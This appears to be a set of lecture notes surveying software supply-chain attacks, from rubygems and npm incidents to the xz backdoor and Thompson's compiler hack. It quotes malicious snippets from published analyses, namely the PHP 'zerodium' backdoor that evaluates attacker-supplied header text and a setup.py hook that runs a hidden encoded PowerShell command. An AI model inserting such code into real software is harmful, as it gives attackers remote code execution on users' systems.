The same kind of thing had happened earlier, in March 2019, with a different Ruby package (bootstrap-sass): zdnet.com/article/backdoor-code-found-in-popular-bootstrap-sass-ruby-library.
In both cases, the github.com source was unchanged; the distribution at
rubygems.org was what was compromised.
There were multiple related vulnerabilities discovered in August 2019: github.com/rubygems/rubygems.org/wiki/Gems-yanked-and-accounts-locked#19-aug-2019
There's also the VestaCP admin interface, and a python package Colourama.
Consider building from source for production versions!
Decompress
A vulnerability in the open-source file-compression utility decompress
was discovered in 2020. The problem is that, while decompressing, it could
overwrite files such as ../../../etc/passwd (or, for that matter,
./foo/bar/../../../../../etc/passwd). This is a very old idea, but it
keeps coming up. It is surprisingly hard to validate legitimate relative
paths.
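Here is a minimal sketch of a purely textual check on an archive entry name (a hypothetical helper, not the decompress code). Real extractors also have to resolve the final path, reject absolute names and symlink tricks, and cope with platform-specific separators, which is part of why this keeps going wrong.

/* sketch only: reject entry names that would escape the extraction directory */
#include <stdio.h>
#include <string.h>

static int entry_escapes(const char *entry) {
    /* Reject absolute paths and any ".." path component. */
    if (entry[0] == '/')
        return 1;
    if (strcmp(entry, "..") == 0 || strncmp(entry, "../", 3) == 0)
        return 1;
    if (strstr(entry, "/../") != NULL ||
        (strlen(entry) >= 3 && strcmp(entry + strlen(entry) - 3, "/..") == 0))
        return 1;
    return 0;
}

int main(void) {
    printf("%d\n", entry_escapes("foo/bar.txt"));                         /* 0: ok */
    printf("%d\n", entry_escapes("../../../etc/passwd"));                 /* 1: rejected */
    printf("%d\n", entry_escapes("./foo/bar/../../../../../etc/passwd")); /* 1: rejected */
    return 0;
}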
PyYAML
YAML is a data-serialization format, not unlike JSON. PyYAML unpacks YAML
data. Alas, it could be tricked, in a bug discovered in 2020, into running
arbitrary constructors (and thus arbitrary code) when deserializing data.
(The pickle library, the standard Python serialization mechanism, had the
same issue a few years earlier.)
Lodash
This is a javascript library that supports a range of common utility
functions. It is used in over ~4 million projects on Github alone. A vuln
discovered in 2019 involved "prototype pollution", eg
modification of Object-level standard methods through introduction of new
child classes.
Octopus
The Octopus scanner was malware on Github that tried to infect other
repositories, through the use of a Netbeans issue. It was discovered in
Spring 2020. Once a Netbeans installation was infected, every .jar file
built with that installation would also carry the infection. See securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain.
Zerodium
In March 2021 it was discovered that an update to PHP contained a
backdoor. If a website used the compromised PHP, someone could execute
arbitrary code through the use of the password "zerodium". The PHP code
was on a private git server git.php.net. It looks like the server itself
was compromised; the malicious code appeared to have been uploaded by two
trusted PHP maintainers (who were not in fact involved).
There is in fact a security company named Zerodium, but they were not
related.
The added code looked something like this (bleepingcomputer.com/news/security/phps-git-server-hacked-to-add-backdoors-to-php-source-code):
convert_to_string(enc);
if (strstr(Z_STRVAL_P(enc), "zerodium")) {
    zend_try {
        zend_eval_string(Z_STRVAL_P(enc)+8, NULL, "REMOVETHIS: sold to zerodium, mid 2017");
The idea was that if the attacker-supplied User-Agent header value began with "zerodium", the rest of the string would be executed as PHP: Z_STRVAL_P(enc)+8 skips over the eight characters of "zerodium". That "REMOVETHIS" string is just the label that gets inserted in error messages and logfiles.
npm colors and faker libraries
Npm (Node.js Package Manager) is a large open repository for javascript
tools. The colors and faker libraries were legit tools that appeared to
have been corrupted by a malicious attacker in January 2022.
Alas, the real situation turned out to be somewhat more complicated:
package developer Marak Squires was simply really mad at big
corporations using his packages without contributing any support. From www.bleepingcomputer.com/news/security/dev-corrupts-npm-libs-colors-and-faker-breaking-thousands-of-apps:
The reason behind this mischief on the
developer's part appears to be retaliation—against
mega-corporations and commercial consumers of open-source projects
who extensively rely on cost-free and community-powered software but do
not, according to the developer, give back to the community.
In November 2020, Marak had warned that he
will no longer be supporting the big corporations with his "free work"
and that commercial entities should consider either forking the projects
or compensating the dev with a yearly "six figure" salary.
This is a complicated development. Most open-source maintainers, while
sympathetic, ultimately decided this was a terrible idea.
PyPi
This is the Python Package Index. Everybody uses it.
FastAPI is a Python framework with a long history. In March 2022, the legitimate package fastapi-toolkit was added. In November 2022, a commit with a malicious backdoor was accepted; it was eventually detected. When incorporated into a web project, the
backdoor allows an external attacker to run arbitrary Python, and make
arbitrary SQL queries (including writes) using a specially crafted HTTP
header. See securitylabs.datadoghq.com/articles/malicious-pypi-package-fastapi-toolkit.
In February 2023, the Phylum team
discovered over two thousand new packages that, while not necessarily
malicious themselves, all contained the following code in the setup.py
file:
if not os.path.exists('tahg'):    # basically never exists
    try:
        subprocess.Popen('powershell -WindowStyle Hidden -EncodedCommand cABvAHcAZQByAHMAaABlAGwAbAAgAEkAbgB...AGMAaABlAC4AZQB4AGUAIgA=',
            shell=False, creationflags=subprocess.CREATE_NO_WINDOW)
    except: pass
So to install one of these packages is to run that mysterious base64-encoded PowerShell command. See blog.phylum.io/phylum-discovers-another-attack-on-pypi.
100,000 infected Github repositories
Beginning in late 2023, a malware group started a large-scale project to:
- fork popular Github repositories
- infect them with malware
- put them back on Github with a very similar name
No one is quite sure how many malicious repos there are, but 100,000 or
so have been identified. Identification is based on the
automated clone process; manual malicious clones are not detected. The
project name itself is the original one (eg numpy).
Many of the malicious github clones are based on the PyPi packages above.
See apiiro.com/blog/malicious-code-campaign-github-repo-confusion-attack.
There is an animated gif there, showing an exec() of a malicious string
tabbed over way to the right.
PyTorch
Here's a discussion of how a White Hat team figured out how to attach
malicious software to PyTorch, the machine-learning front end.
Our exploit path resulted in the ability to
upload malicious PyTorch releases to GitHub, upload releases to AWS,
potentially add code to the main repository branch, backdoor PyTorch
dependencies – the list goes on. In short, it was bad. Quite bad.
Github allows repository-defined workflows to run automatically on pull requests; this feature is called Github Actions. This makes great sense for testing, but it means running untrusted code, and when the workflows run on a project's own self-hosted machines, an outsider's pull request can end up executing code on that infrastructure. See johnstawinski.com/2024/01/11/playing-with-fire-how-we-executed-a-critical-supply-chain-attack-on-pytorch.
Google Search can be dangerous
Brian Krebs has written about how hard it can be to find well-known free
software packages using Google. The bad guys have not only created similar
websites, but in some cases they have paid Google to elevate their sites
in the search rankings. See https://krebsonsecurity.com/2024/01/using-google-search-to-find-software-can-be-risky.
The situation is just as bad with open-source packages intended for
developers. See www.csoonline.com/article/654560/why-open-source-software-supply-chain-attacks-have-tripled-in-a-year.html
and www.fortinet.com/blog/threat-research/supply-chain-attack-via-new-malicious-python-packages.
2024 xz vulnerability
A serious supply-chain attack on ssh was published on March 29, 2024, by
Andres Freund, who discovered it by noting an unexpected increase in the
cpu usage of ssh.
Ssh, or Secure SHell, is the standard encrypted way of logging into remote machines. OpenSSH itself does not use xz, but on many Linux distributions the sshd server is patched to link against libsystemd (for start-up notification), and libsystemd in turn pulls in liblzma, the xz compression library, maintained by Lasse Collin (who is blameless here).
Here is a discussion of the attack itself:
research.swtch.com/xz-script.
Perhaps the most interesting technical part of the attack is how the malicious payload was concealed. xz has always had a directory of binary test files; these are compressed or decompressed and the result is checked against what it was supposed to be. The attackers hid the malicious payload inside new test files! The release tarball's configure machinery runs an m4 (the well-known macro package) script, which (in a non-obvious way) extracts the payload from the test data during the build and links it into liblzma. When an sshd that has loaded the backdoored liblzma receives a connection presenting a key supplied by the attacker, the payload enables remote command execution.
But how did the xz project get compromised? This is
in many ways the more interesting part. See
research.swtch.com/xz-timeline.
The xz package dates from 2004 (ssh is much older; the connection to xz came much later, via libsystemd). In October 2021, Jia Tan appears on the xz mailing list and sends his first patch. He sends more. He gives every appearance of someone interested in helping the xz package move forward. It appears, though, that "Jia Tan" is not a real name.
In April 2022, Jigar Kumar emails the list complaining that the Tan patches have not been incorporated. Then Dennis Ens similarly emails to complain about the Java version. Kumar continues to pressure Collin about how the project is falling way behind, and how Collin needs to pick up the pace. (This sort of abuse is common enough in open source.) In June, Collin writes this:
I haven't lost interest but my ability to care has been fairly limited
mostly due to longterm mental health issues but also due to some other
things. Recently I've worked off-list a bit with Jia Tan on XZ Utils and
perhaps he will have a bigger role in the future, we'll see. It's also
good to keep in mind that this is an unpaid hobby project.
Soon enough, Collin bows to the pressure and Tan becomes a maintainer. But Tan takes his time, building more trust; the backdoored releases (xz 5.6.0 and 5.6.1) do not appear until February and March of 2024.
It is tempting to suspect that this is a nation-state
project, due to the two-year timeline. That takes patience. But there are
some things to suggest that maybe not. The Tan and Kumar
emails have similar formats: Tan is JiaT575 and Kumar
is similar. And while the obfuscation technique is ingenious, there were
some minor problems with the payload.
The article at doublepulsar.com/inside-the-failed-attempt-to-backdoor-ssh-globally-that-got-caught-by-chance-bbfe628fafdd suggests that what was really being backdoored was systemd, the master process launcher. I'm not quite convinced, but systemd does start sshd, and does have waay too many dependencies.
Finally, if you cloned the package from git and built
it yourself, the bug would not be there. You had to be building for a
deb/rpm package distribution.
Thompson Backdoor
Ken Thompson is one of the original developers of Unix. In his 1983
Turing Award speech, "Reflections on Trusting Trust", he described the
following hack:
- The Unix login program is modified to allow in someone with a certain
userid and password
- The C compiler would insert this modification whenever login.c was
compiled, so compiling from a clean copy of login.c wouldn't help
- The C compiler would also insert modifications whenever it
itself was recompiled, so recompiling the C compiler would still leave
you with the Trojan in place.
There was one more step: when the compiler was asked to disassemble the
Trojaned code, it would show what the code was supposed to be,
not what it actually was.
Thompson did implement this as a demo. Nobody really thinks
anyone is trying this today.